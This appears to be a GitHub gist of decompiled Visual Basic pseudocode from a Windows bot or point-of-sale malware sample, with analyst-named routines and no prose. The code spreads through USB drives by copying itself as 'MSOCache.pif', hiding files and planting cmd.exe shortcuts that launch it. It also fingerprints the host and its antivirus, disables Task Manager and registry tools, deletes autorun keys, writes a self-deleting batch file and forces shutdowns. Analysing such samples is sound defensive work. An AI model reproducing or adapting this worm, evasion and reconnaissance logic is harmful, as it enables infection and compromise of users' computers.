loc_403E04: shell_execute("shutdown -t 0 -" & var_88 & " -f") | |
loc_403E10: Exit Sub | |
End Sub | |
Public Sub process_and_write_to_file(content, filename) '403DA8 | |
'Data Table: 401634 | |
Dim var_86 As Integer | |
loc_403D68: On Error Resume Next | |
loc_403D7D: arg_C = process_data(content, 0) | |
loc_403D8D: If (Len(arg_C) > 0) Then | |
loc_403D98: write_to_file(filename, content) | |
loc_403DA1: var_86 = &HFF | |
loc_403DA4: End If | |
loc_403DA6: Result var_86 End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_40_40628C(arg_C, arg_10) '40628C | |
'Data Table: 401634 | |
Dim MemVar_40B3A4 As Global | |
Dim var_118 As Long | |
Dim var_11C As Long | |
Dim var_15C As String | |
loc_406130: If (Len(arg_C) > 8) Then | |
loc_406140: var_8C = Left$(var_8C, 8) | |
loc_406143: End If | |
loc_40614F: var_124 = MemVar_40B3A4.App | |
loc_40615F: var_118 = App.hInstance | |
loc_40616A: If CBool(var_118) Then | |
loc_406178: CopyMemory(var_CC, var_118, &H40) | |
loc_406185: If (var_CC = 23117) Then | |
loc_406197: CopyMemory(var_E4, (var_118 + var_90), &H18) | |
loc_4061A6: If (var_E4 = &H4550) Then | |
loc_4061CD: For var_130 = 0 To CLng((var_DE - 1)): var_120 = var_130 'Long | |
loc_4061E7: CopyMemory(Record Of arg_109, var_114, (((var_118 + var_90) + &H18) + CLng(var_D0))) | |
loc_406200: var_15C = arg_109 | |
loc_406211: var_114 = var_15C | |
loc_406223: If (Left$(var_15C, Len(var_8C)) = var_8C) Then | |
loc_406260: CopyMemory(CStr(String(var_104, CVar(Chr$(0)))), (var_118 + var_100), var_104) | |
loc_406271: Exit For | |
loc_406274: End If | |
loc_40627D: var_11C = (var_11C + &H28) | |
loc_406283: Next var_130 'Long | |
loc_406288: ' Referenced from: 406271 | |
loc_406288: End If | |
loc_406288: End If | |
loc_406288: End If | |
loc_406288: Exit Sub | |
End Sub | |
Public Sub modify_bot_install(arg_C, copy_bot, arg_14, kill_bot) '4076EC | |
'Data Table: 401634 | |
Dim var_A0 As Variant | |
Dim var_B4 As String | |
Dim var_D0 As Integer | |
Dim var_F0 As Boolean | |
loc_407404: On Error Resume Next | |
loc_40740C: If copy_bot Then | |
loc_40741B: FileCopy Me(88), MY_APPNAME | |
loc_407427: shell_execute(MY_APPNAME) | |
loc_407434: If Not(Me(162)) Then | |
loc_407439: Exit Sub | |
loc_40743A: End If | |
loc_40743A: End If | |
loc_407441: If kill_bot Then | |
loc_40744F: kill_task("dwn.exe") | |
loc_407462: kill_task("wscript.exe") | |
loc_407471: kill_task(POS_EXE) | |
loc_40748D: Kill CVar(Me(40) & MY_APPNAME & ".exe") | |
loc_4074A4: Kill HOSTS_PATH | |
loc_4074B5: Kill OUTPUT_TXT | |
loc_4074C6: Kill POS_PATH | |
loc_4074D0: var_B4 = "0" | |
loc_4074DF: disable_tskmgr_regtools("0") | |
loc_4074FF: disable_tskmgr_regtools("1", "0") | |
loc_407512: Set _wscript = WSCRIPT_OBJ | |
loc_407521: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String | |
loc_407528: Call _wscript.RegDelete | |
loc_40753C: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String | |
loc_407543: Call _wscript.RegDelete | |
loc_407557: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String | |
loc_40755E: Call _wscript.RegDelete | |
loc_40758E: var_A0 = CVar("schtasks /" & "end /tn " & """" & MY_APPNAME & ".exe" & """") 'String | |
loc_407592: var_D0 = 0 | |
loc_407598: var_F0 = False | |
loc_4075A0: Call _wscript.Run | |
loc_4075B8: Set _wscript = Nothing | |
loc_4075BC: End If | |
loc_4075D5: filename = var_A0 & make_random_string(TEMP_DIR, var_F0, var_D0, var_A0) & ".cmd" | |
loc_4075EF: If ((Len(arg_C) > 1) Or arg_14) Then | |
loc_4075FB: command = "ping -n 4 127.0.0.1 > nul" & vbCrLf | |
loc_4075FE: End If | |
loc_407603: If arg_14 Then | |
loc_40762D: command = command & "rd /q /s " & """" & "\\.\" & MY_DIR & """" | |
loc_40763E: Else | |
loc_40765E: command = command & "del /F " & """" & Me(88) & """" | |
loc_40766A: End If | |
loc_407676: If (Len(arg_C) > 1) Then | |
loc_407690: command = command & vbCrLf & "start " & arg_C | |
loc_40769A: End If | |
loc_4076D5: write_to_file(filename, command & vbCrLf & "del /F " & """" & filename & """", var_A0) | |
loc_4076DF: shell_execute(filename, var_A0) | |
loc_4076E6: End | |
loc_4076EA: Exit Sub | |
End Sub | |
Public Sub Proc_0_42_408E68 | |
'Data Table: 401634 | |
Dim var_C0 As Variant | |
Dim var_B0 As Variant | |
Dim var_F8 As Variant | |
Dim var_118 As Variant | |
Dim var_108 As Variant | |
Dim arg_2008 As Variant | |
Dim var_1A8 As String | |
Dim var_128 As Variant | |
Dim var_1B8 As String | |
loc_408800: On Error Resume Next | |
loc_40880F: CAdVar | |
loc_40881B: For Each var_98 In MemVar_402104.drives | |
loc_408862: If CBool(var_98.isready And (var_98.freespace > 0) And (var_98.drivetype = 1)) Then | |
loc_40888A: FileCopy Me(88), CStr(var_98.Path & "\" & "MSOCache.pif") | |
loc_4088CD: If get_attribute1(CStr(var_98.Path & "\" & "MSOCache.pif")) Then | |
loc_4088FA: SetAttr CStr(var_98.Path & "\" & "MSOCache.pif"), 6 | |
loc_40890B: End If | |
loc_40891A: var_C0 = var_98.Path & "\" | |
loc_408924: LateMemCallLdVar | |
loc_408932: CAdVar | |
loc_408946: For Each var_9C In MemVar_402104.Files | |
loc_408972: If CBool(InStr(1, var_9C.Name, ".", 0)) Then | |
loc_4089A8: arg_2008 = Split(CStr(var_9C.Name), ".", -1, 0) | |
loc_4089B2: var_90 = arg_2008 | |
loc_4089DD: If (LCase$(var_90(UBound(var_90, 1))) <> "lnk") Then | |
loc_4089EB: var_9C.Attributes = 6 | |
loc_408A04: If CBool(var_9C.Name <> "MSOCache.pif") Then | |
loc_408A38: var_118 = var_98.Path & "\" & CVar(var_90(0)) & "." & "lnk" | |
loc_408A42: LateMemCallLdVar | |
loc_408A4A: CAdVar | |
loc_408A61: var_108 = "HKLM\software\classes\" | |
loc_408A8C: LateMemCallLdVar | |
loc_408A9D: var_F8 = CVar("HKLM\software\classes\" & "." & var_90(UBound(var_90, 1)) & "\") & MemVar_402104 & "\defaulticon\" | |
loc_408AA7: LateMemCallLdVar | |
loc_408AB0: var_88 = CStr(MemVar_402104) | |
loc_408ACC: Set var_180 = MemVar_402104 | |
loc_408ADB: var_180.windowstyle = 7 | |
loc_408AEA: var_180.targetpath = "cmd.exe" | |
loc_408AFC: var_180.workingdirectory = CVar(0) | |
loc_408B89: var_1A8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & Replace(CStr(var_9C.Name), " ", """" & " " & """", 1, -1, 0) | |
loc_408B97: var_180.arguments = CVar(var_1A8 & "&exit") | |
loc_408BD3: If CBool(InStr(1, var_88, ",", 0)) Then | |
loc_408BE2: var_180.iconlocation = CVar(var_88) | |
loc_408BE9: Else | |
loc_408BF7: var_180.iconlocation = var_9C.Path | |
loc_408BFE: End If | |
loc_408C03: Call var_180.save | |
loc_408C0D: Set var_180 = Nothing | |
loc_408C11: End If | |
loc_408C13: End If | |
loc_408C15: End If | |
loc_408C1C: Next | |
loc_408C31: var_C0 = var_98.Path & "\" | |
loc_408C3B: LateMemCallLdVar | |
loc_408C49: CAdVar | |
loc_408C5D: For Each var_A0 In MemVar_402104.subfolders | |
loc_408C6E: var_A0.Attributes = 6 | |
loc_408C9F: var_128 = var_98.Path & "\" & var_A0.Name & "." & "lnk" | |
loc_408CA9: LateMemCallLdVar | |
loc_408CB1: CAdVar | |
loc_408CD8: var_B0 = CVar("HKLM\software\classes\" & "folder" & "\defaulticon\") 'String | |
loc_408CE1: LateMemCallLdVar | |
loc_408CEA: var_8C = CStr(MemVar_402104) | |
loc_408CFC: Set var_1B4 = MemVar_402104 | |
loc_408D0B: var_1B4.windowstyle = 7 | |
loc_408D1A: var_1B4.targetpath = "cmd.exe" | |
loc_408D2C: var_1B4.workingdirectory = CVar(0) | |
loc_408DC0: var_1B8 = "/c " & "start " & Replace("MSOCache.pif", " ", """" & " " & """", 1, -1, 0) & "&" & "start " & "explorer " & Replace(CStr(var_A0.Name), " ", """" & " " & """", 1, -1, 0) | |
loc_408DCE: var_1B4.arguments = CVar(var_1B8 & "&exit") | |
loc_408E0C: If CBool(InStr(1, var_8C, ",", 0)) Then | |
loc_408E1B: var_1B4.iconlocation = CVar(var_8C) | |
loc_408E22: Else | |
loc_408E30: var_1B4.iconlocation = var_A0.Path | |
loc_408E37: End If | |
loc_408E3C: Call var_1B4.save | |
loc_408E46: Set var_1B4 = Nothing | |
loc_408E4F: Next | |
loc_408E55: End If | |
loc_408E5C: Next | |
loc_408E64: Exit Sub | |
End Sub | |
Public Sub fetch_av_products | |
'Data Table: 401634 | |
Dim var_A8 As Variant | |
Dim var_F8 As Variant | |
Dim var_D8 As Long | |
loc_404F94: On Error Resume Next | |
loc_404F9C: var_8C = "SecurityCenter" | |
loc_404FAF: var_A8 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "CurrentVersion") 'String | |
loc_404FB8: LateMemCallLdVar | |
loc_404FD2: If (MemVar_402104 > 6) Then | |
loc_404FE2: var_8C = var_8C & CStr(2) | |
loc_404FE8: End If | |
loc_404FF1: var_F8 = CVar("select * from " & "AntivirusProduct") 'String | |
loc_405014: VarLateMemCallLdVar | |
loc_40501C: CAdVar | |
loc_40503A: For Each var_94 In GetObject(CVar("winmgmts:" & "\\.\root\" & var_8C), var_D8) | |
loc_405059: If (Len(var_94.DisplayName) > 0) Then | |
loc_405067: var_88 = CStr(var_94.DisplayName) | |
loc_40506D: End If | |
loc_40506F: Exit For | |
loc_40507A: Next | |
loc_405082: Exit Sub | |
End Sub | |
Public Sub is_battery_present | |
'Data Table: 401634 | |
Dim var_F0 As Variant | |
loc_404440: On Error Resume Next | |
loc_404453: var_F0 = CVar("select * from " & "win32_" & "Battery") 'String | |
loc_404470: VarLateMemCallLdVar | |
loc_404478: CAdVar | |
loc_4044A3: If (GetObject("winmgmts:", var_D0).Count > 0) Then | |
loc_4044AB: var_88 = "1" | |
loc_4044B1: Else | |
loc_4044B6: var_88 = "0" | |
loc_4044B9: End If | |
loc_4044BB: Exit Sub | |
End Sub | |
Public Sub fetch_processor | |
'Data Table: 401634 | |
Dim var_F4 As Variant | |
Dim var_D4 As Long | |
loc_404AF8: On Error Resume Next | |
loc_404B0B: var_F4 = CVar("win32_" & "Process" & "or") 'String | |
loc_404B28: VarLateMemCallLdVar | |
loc_404B30: CAdVar | |
loc_404B32: Set var_8C = GetObject("winmgmts:", var_D4) | |
loc_404B5B: If (var_8C.Count > 0) Then | |
loc_404B66: For Each var_90 In var_8C | |
loc_404B85: If (Len(var_90.Name) > 0) Then | |
loc_404B93: var_88 = CStr(var_90.Name) | |
loc_404B99: End If | |
loc_404B9B: Exit For | |
loc_404BA6: Next | |
loc_404BAC: End If | |
loc_404BB0: Exit Sub | |
End Sub | |
Public Sub fetch_video_controller | |
'Data Table: 401634 | |
Dim var_F0 As Variant | |
Dim var_D0 As Long | |
loc_4048E0: On Error Resume Next | |
loc_4048EC: var_F0 = CVar("win32_" & "VideoController") 'String | |
loc_404909: VarLateMemCallLdVar | |
loc_404911: CAdVar | |
loc_404913: Set var_8C = GetObject("winmgmts:", var_D0) | |
loc_404939: If (var_8C.Count > 0) Then | |
loc_404944: For Each var_90 In var_8C | |
loc_404963: If (Len(var_90.VideoProcessor) > 0) Then | |
loc_404971: var_88 = CStr(var_90.Caption) | |
loc_404977: End If | |
loc_404979: Exit For | |
loc_404984: Next | |
loc_40498A: End If | |
loc_40498E: Exit Sub | |
End Sub | |
Public Sub fetch_logical_disks | |
'Data Table: 401634 | |
Dim var_F0 As Variant | |
Dim var_A0 As Variant | |
Dim var_D0 As Long | |
loc_40523C: On Error Resume Next | |
loc_40524F: var_F0 = CVar("select * from " & "win32_" & "LogicalDisk") 'String | |
loc_40526C: VarLateMemCallLdVar | |
loc_405274: CAdVar | |
loc_405292: For Each obj In GetObject("winmgmts:", var_D0) | |
loc_4052A6: var_A0 = 0 | |
loc_4052B1: If (Len(obj.VolumeSerialNumber) > var_A0) Then | |
loc_4052BF: VOL_SERIAL = CStr(obj.VolumeSerialNumber) | |
loc_4052CA: Exit For | |
loc_4052D3: Else | |
loc_4052F6: If (Len(GetSetting("L!NK", "1", "0", var_A0)) <> 8) Then | |
loc_40530C: SaveSetting("L!NK", "1", "0", make_random_string(var_F0)) | |
loc_405314: End If | |
loc_405328: VOL_SERIAL = GetSetting("L!NK", "1", "0", var_A0) | |
loc_405330: Exit For | |
loc_405336: End If | |
loc_40533D: Next | |
loc_405345: Exit Sub | |
End Sub | |
Public Sub fetch_system | |
'Data Table: 401634 | |
Dim var_F4 As Variant | |
Dim var_D4 As Variant | |
loc_404D30: On Error Resume Next | |
loc_404D43: var_F4 = CVar("select * from " & "win32_" & "ComputerSystem") 'String | |
loc_404D60: VarLateMemCallLdVar | |
loc_404D68: CAdVar | |
loc_404D86: For Each obj In GetObject("winmgmts:", var_D4) | |
loc_404DA5: If (Len(obj.TotalPhysicalMemory) > 0) Then | |
loc_404DDE: var_88 = FormatNumber((obj.TotalPhysicalMemory / &H40000000), -1, -2, -2, -2) | |
loc_404DEA: Exit For | |
loc_404DF0: End If | |
loc_404DF7: Next | |
loc_404DFF: Exit Sub | |
End Sub | |
Public Sub Proc_0_49_404F40(index) '404F40 | |
'Data Table: 401634 | |
loc_404E5C: On Error Resume Next | |
loc_404E81: ReDim _arr(0 To 8) | |
loc_404E98: _arr(0) = 97 'a | |
loc_404EA6: _arr(1) = 98 'b | |
loc_404EB4: _arr(2) = 99 'c | |
loc_404EC2: _arr(3) = 100 'd | |
loc_404ED0: _arr(4) = 101 'e | |
loc_404EDE: _arr(5) = 105 'i | |
loc_404EEC: _arr(6) = 102 'f | |
loc_404EFA: _arr(7) = 103 'g | |
loc_404F08: _arr(8) = 104 'h | |
loc_404F2C: var_88 = VOL_SERIAL & "." & ChrW$(CLng(Array(_arr)(index))) | |
loc_404F3F: Exit Sub | |
End Sub | |
Public Sub make_random_string | |
'Data Table: 401634 | |
loc_4042D8: On Error Resume Next | |
loc_4042E0: Randomize(var_AC) | |
loc_4042F7: For var_B4 = 1 To 8: var_8C = var_B4 'Long | |
loc_40432C: var_88 = var_88 & Mid$("ABCDEF0123456789", CLng(Int(((Rnd(var_AC) * CDbl(&H10)) + CDbl(1)))), 1) | |
loc_40433E: Next var_B4 'Long | |
loc_404345: Exit Sub | |
End Sub | |
Public Sub fingerprint_system(arg_C) '407E60 | |
'Data Table: 401634 | |
Dim var_B4 As Variant | |
Dim var_174 As String | |
Dim var_1B0 As String | |
loc_407B30: On Error Resume Next | |
loc_407B7D: var_88 = LCase$(Left$(Me(124), 1) & Right$(Me(124), 1) & Mid$(Me(124), &H10, 1)) | |
loc_407B9C: If (Len(arg_C) <> 0) Then | |
loc_407BBD: var_8C = String$(&HE, "|") & arg_C | |
loc_407BC9: Else | |
loc_407BDC: var_C4 = Environ$(CVar("COMPUTER" & "Name")) | |
loc_407BF3: var_C8 = Environ$(CVar("USER" & "Name")) | |
loc_407C0A: var_DC = Environ$(CVar("USER" & "DOMAIN")) | |
loc_407C27: var_B4 = CVar("HKLM" & "\Software\Microsoft\Windows NT\CurrentVersion\" & "Product" & "Name") 'String | |
loc_407C30: LateMemCallLdVar | |
loc_407C39: var_CC = CStr(MemVar_402104) | |
loc_407C79: LateMemCallLdVar | |
loc_407C9F: var_D0 = FormatNumber((MemVar_402104.TotalSize / &H40000000), CVar(Environ$("HOMEDRIVE")), -1, -2, -2) | |
loc_407CC4: var_B4 = CVar("Process" & "OR_ARCHITEW" & CStr(6432)) 'String | |
loc_407CE2: If (Len(Environ$(var_B4)) = 0) Then | |
loc_407CEA: var_D4 = "1" | |
loc_407CF0: Else | |
loc_407CF5: var_D4 = "0" | |
loc_407CF8: End If | |
loc_407CFF: If CopyMemory(-2, var_B4, ) Then | |
loc_407D07: var_D8 = "1" | |
loc_407D0D: Else | |
loc_407D12: var_D8 = "0" | |
loc_407D15: End If | |
loc_407D7E: var_174 = fetch_system(fetch_av_products(var_C4 & "|") & "|" & var_CC & "|" & VOL_SERIAL & "|" & "L!NK" & "|" & var_C8 & "|") & "|" | |
loc_407DE1: var_1B0 = is_battery_present(fetch_video_controller(fetch_processor(var_174) & "|") & "|" & var_D0 & "|" & var_D4 & "|" & var_D8 & "|") & "|" | |
loc_407DEF: var_8C = var_1B0 & var_DC & "|" | |
loc_407E33: End If | |
loc_407E4D: Me(12) = var_88 & "=" & Proc_0_18_405D30(var_8C) | |
loc_407E5C: Exit Sub | |
End Sub | |
Public Sub get_object_type(type) '404408 | |
'Data Table: 401634 | |
Dim _type As Long | |
loc_40438B: _type = type | |
loc_404397: If (_type = 0) Then | |
loc_4043A1: var_88 = "WScript." & "Shell" | |
loc_4043A7: Else | |
loc_4043B0: If (_type = 1) Then | |
loc_4043B6: var_88 = "Scripting.FileSystemObject" | |
loc_4043BC: Else | |
loc_4043C5: If (_type = 2) Then | |
loc_4043CF: var_88 = "MSXML2." & "ServerXMLHTTP" | |
loc_4043D5: Else | |
loc_4043DE: If (_type = 3) Then | |
loc_4043E8: var_88 = "Shell" & ".Application" | |
loc_4043EE: Else | |
loc_4043F7: If (_type = 4) Then | |
loc_404401: var_88 = "MSXML2." & "DOMDocument" | |
loc_404404: End If | |
loc_404404: End If | |
loc_404404: End If | |
loc_404404: End If | |
loc_404404: End If | |
loc_404404: Exit Sub | |
End Sub | |
Public Sub init_globals | |
'Data Table: 401634 | |
Dim var_B0 As Variant | |
loc_406B60: CAdVar | |
loc_406B62: WSCRIPT_OBJ = CreateObject(get_object_type(0), 0) | |
loc_406B8E: CAdVar | |
loc_406B90: SCRIPTINGFSO_OBJ = CreateObject(get_object_type(1), 0) | |
loc_406BBC: CAdVar | |
loc_406BBE: MSXML_OBJ = CreateObject(get_object_type(2), 0) | |
loc_406BE1: TEMP_DIR = Environ$("TEMP") & "\" | |
loc_406C04: APPDATA_DIR = Environ$("APPDATA") & "\" | |
loc_406C27: WINDIR = Environ$("WINDIR") & "\" | |
loc_406C3F: var_B4 = Me.Global.App | |
loc_406C53: MY_DIR = App.Path & "\" | |
loc_406C5F: var_B0 = "Startup" | |
loc_406C6A: LateMemCallLdVar | |
loc_406C7C: Me(40) = CStr(MemVar_402104 & "\") | |
loc_406C99: SYSTEM32_DIR = WINDIR & "system32" & "\" | |
loc_406CAB: HOSTS_PATH = SYSTEM32_DIR & "drivers\etc\hosts" | |
loc_406CC7: var_88 = Environ$(Me(136)) & "\" | |
loc_406CDB: If Not(Proc_0_14_403F14(var_88, 0)) Then | |
loc_406CE3: Me(52) = TEMP_DIR | |
loc_406CEB: Else | |
loc_406CEE: Me(52) = var_88 | |
loc_406CF3: End If | |
loc_406D15: MY_APPNAME = Me(52) & Me(144) & "\" & MY_APPNAME & ".exe" | |
loc_406D34: LOGNAME = MY_DIR & "log" & ".c" | |
loc_406D46: DWN_EXE = MY_DIR & "dwn.exe" | |
loc_406D53: POS_EXE = "POS" & ".exe" | |
loc_406D69: KEYS_C = MY_DIR & "keys" & ".c" | |
loc_406D7D: POS_PATH = APPDATA_DIR & POS_EXE | |
loc_406D8C: OUTPUT_TXT = APPDATA_DIR & "output.txt" | |
loc_406DA2: OFF_C = MY_DIR & "Off" & ".c" | |
loc_406DBB: WIN_C = MY_DIR & "win" & ".c" | |
loc_406DC4: Exit Sub | |
End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment